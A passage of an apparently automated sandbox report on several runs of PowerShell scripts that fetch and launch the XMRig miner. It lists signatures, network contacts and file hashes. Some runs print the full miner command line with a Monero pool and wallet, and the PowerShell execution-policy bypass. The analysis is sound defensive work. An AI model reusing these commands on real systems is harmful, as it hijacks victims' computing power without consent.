| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1352 wrote to memory of 1800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1352 wrote to memory of 1800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 52.111.229.48:443 | | tcp |
Files
memory/1352-0-0x00007FFA4ADF3000-0x00007FFA4ADF5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sygrxq5o.m5a.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:11
Platform
win10v2004-20240508-en
Max time kernel
1755s
Max time network
1765s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/2504-0-0x00007FFD85903000-0x00007FFD85905000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mzqadwub.jvw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral31
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:17
Platform
win10v2004-20240508-en
Max time kernel
1727s
Max time network
1741s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/3276-0-0x00007FFA94B33000-0x00007FFA94B35000-memory.dmp
memory/3276-1-0x0000022BEE440000-0x0000022BEE462000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cd4rylai.r3y.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:03
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1779s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3816 wrote to memory of 1672 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3816 wrote to memory of 1672 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 52.111.227.14:443 | | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sa2whhed.bxu.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3816-25-0x00007FFEF9160000-0x00007FFEF9B4C000-memory.dmp
memory/3816-48-0x00000227DCE50000-0x00000227DCE62000-memory.dmp
memory/3816-61-0x00000227DCE30000-0x00000227DCE3A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:11
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4212 wrote to memory of 4612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4212 wrote to memory of 4612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
memory/4212-3-0x00007FFE454A3000-0x00007FFE454A4000-memory.dmp
memory/4212-5-0x000002003F870000-0x000002003F892000-memory.dmp
memory/4212-8-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/4212-9-0x000002003FA20000-0x000002003FA96000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cmahcz4d.k35.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4212-10-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/4212-25-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/4212-48-0x000002003FA00000-0x000002003FA12000-memory.dmp
memory/4212-61-0x000002003F9E0000-0x000002003F9EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral23
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:14
Platform
win10v2004-20240508-en
Max time kernel
1625s
Max time network
1636s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/1976-0-0x00007FFA45923000-0x00007FFA45925000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t1j5jifp.sd5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 15:47
Platform
win7-20240221-en
Max time kernel
1559s
Max time network
1560s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 15:51
Platform
win10v2004-20240426-en
Max time kernel
1799s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4156 wrote to memory of 4296 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4156 wrote to memory of 4296 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.107.17.2.in-addr.arpa | udp |
| US | 52.111.227.11:443 | | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
Files
memory/4156-0-0x00007FFA0F1E3000-0x00007FFA0F1E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u1yjtfmd.0pk.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:04
Platform
win10v2004-20240426-en
Max time kernel
1798s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1844 wrote to memory of 4664 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1844 wrote to memory of 4664 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/1844-0-0x00007FFFD8E43000-0x00007FFFD8E45000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4nbcer0p.e3b.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
